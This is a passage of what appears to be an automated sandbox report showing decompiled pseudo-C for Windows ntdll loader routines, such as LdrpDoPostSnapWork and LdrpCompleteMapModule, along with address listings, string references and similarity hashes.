				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E012D934A() != 0) {
								_t159 = E0134A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x13b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01345510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x13b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E012D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E012D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E012D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x13b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x13b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E012E2280(_t92, 0x13b86cc);
															_t94 = E01399DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x13b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E012D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x13b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x13b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0130F380(_t136, 0x12a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E012E2280(_t108, 0x13b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01399D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E012DFFB0(_t118, _t156, 0x13b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01309A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                            0x012d8799
                                                            0x012d879d
                                                            0x012d87a1
                                                            0x012d87a3
                                                            0x012d87a8
                                                            0x012d87c3
                                                            0x012d87c3
                                                            0x012d87c8
                                                            0x012d87d1
                                                            0x012d87d4
                                                            0x012d87d8
                                                            0x012d87e5
                                                            0x012d87ec
                                                            0x01329bfe
                                                            0x01329c00
                                                            0x01329c02
                                                            0x01329c08
                                                            0x01329c0d
                                                            0x01329c0f
                                                            0x01329c14
                                                            0x01329c2d
                                                            0x01329c32
                                                            0x01329c37
                                                            0x01329c3a
                                                            0x01329c3c
                                                            0x01329c42
                                                            0x01329c42
                                                            0x01329c3c
                                                            0x01329c02
                                                            0x012d87da
                                                            0x012d87df
                                                            0x012d87e3
                                                            0x00000000
                                                            0x00000000
                                                            0x012d87e3
                                                            0x012d87f2
                                                            0x00000000
                                                            0x012d87fb
                                                            0x012d87fd
                                                            0x012d87fe
                                                            0x012d880e
                                                            0x012d880f
                                                            0x012d8810
                                                            0x012d8814
                                                            0x012d881a
                                                            0x012d881c
                                                            0x012d881f
                                                            0x012d8821
                                                            0x012d8822
                                                            0x012d8824
                                                            0x012d8826
                                                            0x012d882c
                                                            0x012d882e
                                                            0x01329c48
                                                            0x01329c48
                                                            0x012d8834
                                                            0x012d8834
                                                            0x012d8837
                                                            0x00000000
                                                            0x00000000
                                                            0x012d8837
                                                            0x012d882e
                                                            0x012d883d
                                                            0x012d8840
                                                            0x012d8843
                                                            0x012d8846
                                                            0x012d8849
                                                            0x012d884c
                                                            0x012d884e
                                                            0x012d8850
                                                            0x012d8852
                                                            0x012d8854
                                                            0x012d8857
                                                            0x012d88b4
                                                            0x012d88b6
                                                            0x012d88b6
                                                            0x012d8859
                                                            0x012d8859
                                                            0x012d8859
                                                            0x012d8861
                                                            0x012d8866
                                                            0x012d886a
                                                            0x012d893d
                                                            0x012d8941
                                                            0x00000000
                                                            0x012d8947
                                                            0x012d8947
                                                            0x012d894a
                                                            0x012d894c
                                                            0x00000000
                                                            0x012d8952
                                                            0x012d8955
                                                            0x012d895a
                                                            0x012d895d
                                                            0x012d895d
                                                            0x012d895f
                                                            0x012d8961
                                                            0x012d8961
                                                            0x012d8968
                                                            0x00000000
                                                            0x00000000
                                                            0x012d896a
                                                            0x012d896b
                                                            0x012d896e
                                                            0x00000000
                                                            0x012d8970
                                                            0x012d8970
                                                            0x012d8970
                                                            0x012d8970
                                                            0x012d8972
                                                            0x012d8972
                                                            0x012d8974
                                                            0x00000000
                                                            0x012d897a
                                                            0x012d897a
                                                            0x012d897d
                                                            0x00000000
                                                            0x012d8983
                                                            0x01329c65
                                                            0x01329c6d
                                                            0x01329c72
                                                            0x01329c75
                                                            0x01329c75
                                                            0x01329c82
                                                            0x01329c86
                                                            0x01329c87
                                                            0x01329c88
                                                            0x01329c89
                                                            0x01329c8c
                                                            0x01329c90
                                                            0x01329c95
                                                            0x01329c97
                                                            0x01329ca0
                                                            0x01329ca3
                                                            0x01329ca9
                                                            0x01329ca9
                                                            0x00000000
                                                            0x01329ca9
                                                            0x01329ca3
                                                            0x00000000
                                                            0x01329c97
                                                            0x012d897d
                                                            0x00000000
                                                            0x012d8974
                                                            0x012d8988
                                                            0x012d8992
                                                            0x012d8996
                                                            0x00000000
                                                            0x012d8996
                                                            0x012d894c
                                                            0x00000000
                                                            0x012d8870
                                                            0x012d887b
                                                            0x012d887d
                                                            0x012d887f
                                                            0x012d8881
                                                            0x012d8884
                                                            0x012d8884
                                                            0x012d8886
                                                            0x012d8889
                                                            0x012d888c
                                                            0x012d888e
                                                            0x012d8891
                                                            0x012d8891
                                                            0x012d8898
                                                            0x00000000
                                                            0x00000000
                                                            0x012d889a
                                                            0x012d889b
                                                            0x012d889e
                                                            0x00000000
                                                            0x00000000
                                                            0x012d88a0
                                                            0x012d88a8
                                                            0x012d88b0
                                                            0x012d88b2
                                                            0x012d88d3
                                                            0x012d88d5
                                                            0x00000000
                                                            0x012d88d7
                                                            0x012d88db
                                                            0x012d88dc
                                                            0x012d88e0
                                                            0x012d88e8
                                                            0x012d88ee
                                                            0x012d88f0
                                                            0x012d88f3
                                                            0x012d88fc
                                                            0x012d8901
                                                            0x012d8906
                                                            0x012d890c
                                                            0x012d890c
                                                            0x012d890f
                                                            0x012d8916
                                                            0x012d8917
                                                            0x012d8918
                                                            0x012d8919
                                                            0x012d891a
                                                            0x012d891f
                                                            0x012d8921
                                                            0x01329c52
                                                            0x01329c55
                                                            0x01329c5b
                                                            0x01329cac
                                                            0x01329cc0
                                                            0x01329cc0
                                                            0x01329c55
                                                            0x012d8927
                                                            0x012d8927
                                                            0x012d892f
                                                            0x012d8933
                                                            0x00000000
                                                            0x012d88f5
                                                            0x012d88f5
                                                            0x00000000
                                                            0x012d88f7
                                                            0x012d88f7
                                                            0x012d88fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x012d88fa
                                                            0x012d88f5
                                                            0x012d88f3
                                                            0x00000000
                                                            0x012d88d5
                                                            0x00000000
                                                            0x012d88b2
                                                            0x012d88c9
                                                            0x00000000
                                                            0x012d88c9
                                                            0x012d887f
                                                            0x012d886a
                                                            0x012d8857
                                                            0x012d8852
                                                            0x012d88bf
                                                            0x012d88bf
                                                            0x012d87aa
                                                            0x012d87ad
                                                            0x012d87ae
                                                            0x012d87b4
                                                            0x012d87b5
                                                            0x012d87b6
                                                            0x012d87b8
                                                            0x012d87bd
                                                            0x012d87c1
                                                            0x012d87f4
                                                            0x012d87fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x012d87c1
                                                            0x00000000

                                                            Strings
                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01329C18
                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01329C28
                                                            • LdrpDoPostSnapWork, xrefs: 01329C1E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                            • API String ID: 2994545307-1948996284
                                                            • Opcode ID: f96b0739967429bcbfa69af71623374260cca592893cc50520fcf3eeeccbeb3b
                                                            • Instruction ID: 37c9a3f2ab0583ea1b08171b814ef915cc916157650ff6834ceba774ddd0a15c
                                                            • Opcode Fuzzy Hash: f96b0739967429bcbfa69af71623374260cca592893cc50520fcf3eeeccbeb3b
                                                            • Instruction Fuzzy Hash: 83910471A2022BDFEF18DF59D481ABAB7B9FF44318F454069EA45AB240E730E901CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012D7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E012D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E012DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E012CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x13b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01345510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x13b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E012E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E012E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01347016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E012E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E012E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01347016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E012FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E012CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                            0x012d7e4c
                                                            0x012d7e50
                                                            0x012d7e55
                                                            0x012d7e58
                                                            0x012d7e5d
                                                            0x012d7e71
                                                            0x012d7f33
                                                            0x012d7e77
                                                            0x012d7e77
                                                            0x012d7e79
                                                            0x012d7e79
                                                            0x012d7e7e
                                                            0x012d7f45
                                                            0x01329848
                                                            0x00000000
                                                            0x01329848
                                                            0x012d7f4e
                                                            0x012d7f53
                                                            0x012d7f5a
                                                            0x00000000
                                                            0x00000000
                                                            0x0132985a
                                                            0x01329862
                                                            0x01329866
                                                            0x00000000
                                                            0x0132986c
                                                            0x00000000
                                                            0x0132986c
                                                            0x012d7e84
                                                            0x012d7e84
                                                            0x012d7e8d
                                                            0x01329871
                                                            0x012d7eb8
                                                            0x012d7ec0
                                                            0x012d7ec0
                                                            0x012d7e9a
                                                            0x0132987e
                                                            0x00000000
                                                            0x00000000
                                                            0x01329884
                                                            0x0132988b
                                                            0x013298a7
                                                            0x013298ac
                                                            0x013298b1
                                                            0x013298b6
                                                            0x013298b8
                                                            0x013298b8
                                                            0x013298b9
                                                            0x00000000
                                                            0x013298b9
                                                            0x012d7ea0
                                                            0x012d7ea7
                                                            0x00000000
                                                            0x00000000
                                                            0x012d7eac
                                                            0x012d7eb1
                                                            0x012d7ec6
                                                            0x012d7ed0
                                                            0x013298cc
                                                            0x012d7ed6
                                                            0x012d7ed6
                                                            0x012d7ed6
                                                            0x012d7ede
                                                            0x012d7ee3
                                                            0x013298e3
                                                            0x013298f0
                                                            0x01329902
                                                            0x013298f2
                                                            0x013298fb
                                                            0x013298fb
                                                            0x01329907
                                                            0x0132991d
                                                            0x0132991d
                                                            0x01329907
                                                            0x013298e3
                                                            0x012d7ef0
                                                            0x012d7f14
                                                            0x012d7f14
                                                            0x012d7f1e
                                                            0x01329946
                                                            0x012d7f24
                                                            0x012d7f24
                                                            0x012d7f24
                                                            0x012d7f2c
                                                            0x0132996a
                                                            0x01329975
                                                            0x01329975
                                                            0x0132997e
                                                            0x01329993
                                                            0x01329993
                                                            0x0132997e
                                                            0x00000000
                                                            0x012d7ef2
                                                            0x012d7efc
                                                            0x012d7f0a
                                                            0x012d7f0e
                                                            0x01329933
                                                            0x00000000
                                                            0x01329933
                                                            0x00000000
                                                            0x012d7f0e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x012d7eb1

                                                            Strings
                                                            • minkernel\ntdll\ldrmap.c, xrefs: 013298A2
                                                            • LdrpCompleteMapModule, xrefs: 01329898
                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01329891
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                            • API String ID: 0-1676968949
                                                            • Opcode ID: 8a6b7ff7726a82dbbb90c96213546c6af37e7916b55ba3123e83e144a32d66f6
                                                            • Instruction ID: 6c53e2c5fe37a781ac5bcbeec2d4b0f65b8008fec96fef3bdf16a158bd6c1573
                                                            • Opcode Fuzzy Hash: 8a6b7ff7726a82dbbb90c96213546c6af37e7916b55ba3123e83e144a32d66f6
                                                            • Instruction Fuzzy Hash: E6510131A20756DBEB22DB6CC944B6A7BE4EB0031CF0406A9EA519B7D1D7B8ED00C790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012CE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E012CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E012CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E013095D0();
						}
						if(_t78 != 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0130FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0130BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01309600();
					if(_t97 < 0) {
						goto L6;
					}
					E0130BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L012CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0130BB40(_t83, _t102 + 0x24, _t78);
								if(L012D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0130BB40(_t84, _t102 + 0x24, _t94);
									if(L012D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                            0x012ce620
                                                            0x012ce628
                                                            0x012ce62f
                                                            0x012ce631
                                                            0x012ce635
                                                            0x012ce637
                                                            0x012ce63e
                                                            0x01325503
                                                            0x01325503
                                                            0x012ce64c
                                                            0x012ce64c
                                                            0x012ce651
                                                            0x00000000
                                                            0x00000000
                                                            0x012ce661
                                                            0x012ce665
                                                            0x0132542a
                                                            0x012ce715
                                                            0x012ce71a
                                                            0x012ce71c
                                                            0x012ce720
                                                            0x012ce720
                                                            0x012ce727
                                                            0x012ce736
                                                            0x012ce736
                                                            0x012ce743
                                                            0x012ce743
                                                            0x012ce673
                                                            0x012ce678
                                                            0x012ce67d
                                                            0x012ce682
                                                            0x012ce685
                                                            0x012ce692
                                                            0x012ce69b
                                                            0x012ce6a3
                                                            0x012ce6ad
                                                            0x012ce6b1
                                                            0x012ce6b2
                                                            0x012ce6bb
                                                            0x012ce6bf
                                                            0x012ce6c0
                                                            0x012ce6c8
                                                            0x012ce6cc
                                                            0x012ce6d5
                                                            0x012ce6d9
                                                            0x00000000
                                                            0x00000000
                                                            0x012ce6e5
                                                            0x012ce6ea
                                                            0x012ce6f9
                                                            0x012ce70b
                                                            0x012ce70f
                                                            0x01325439
                                                            0x0132545e
                                                            0x0132545e
                                                            0x00000000
                                                            0x0132545e
                                                            0x0132543b
                                                            0x0132543e
                                                            0x01325440
                                                            0x01325445
                                                            0x01325472
                                                            0x01325475
                                                            0x0132548d
                                                            0x01325493
                                                            0x013254a9
                                                            0x00000000
                                                            0x00000000
                                                            0x013254ab
                                                            0x013254b4
                                                            0x013254bc
                                                            0x013254c8
                                                            0x013254de
                                                            0x013254fb
                                                            0x013254e0
                                                            0x013254e6
                                                            0x013254eb
                                                            0x013254eb
                                                            0x013254de
                                                            0x00000000
                                                            0x013254bc
                                                            0x01325477
                                                            0x0132547a
                                                            0x01325480
                                                            0x01325483
                                                            0x01325486
                                                            0x0132548b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0132548b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x01325447
                                                            0x01325447
                                                            0x01325447
                                                            0x01325447
                                                            0x0132544e
                                                            0x00000000
                                                            0x00000000
                                                            0x01325450
                                                            0x01325452
                                                            0x01325455
                                                            0x0132545a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0132545c
                                                            0x0132546a
                                                            0x0132546d
                                                            0x0132546f
                                                            0x00000000
                                                            0x0132546f
                                                            0x012ce70f

                                                            Strings
                                                            • @, xrefs: 012CE6C0
                                                            • InstallLanguageFallback, xrefs: 012CE6DB
                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 012CE68C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                            • API String ID: 0-1757540487
                                                            • Opcode ID: bdf51ea5f90f2008ee12c4f33d0807c42c62386dc9ef36bad96574bd4eefbebd
                                                            • Instruction ID: 6d661fdf2bac1c1bf22de02c3b1b7348bf8a8483d9a9c172e2b78b666691c99f
                                                            • Opcode Fuzzy Hash: bdf51ea5f90f2008ee12c4f33d0807c42c62386dc9ef36bad96574bd4eefbebd
                                                            • Instruction Fuzzy Hash: 1951E7765143569BD715EF28C840ABBB7E8BF88618F05092EFA85E7240F734DA04C792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013451BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E013451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x13a05f0);
				E0131D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
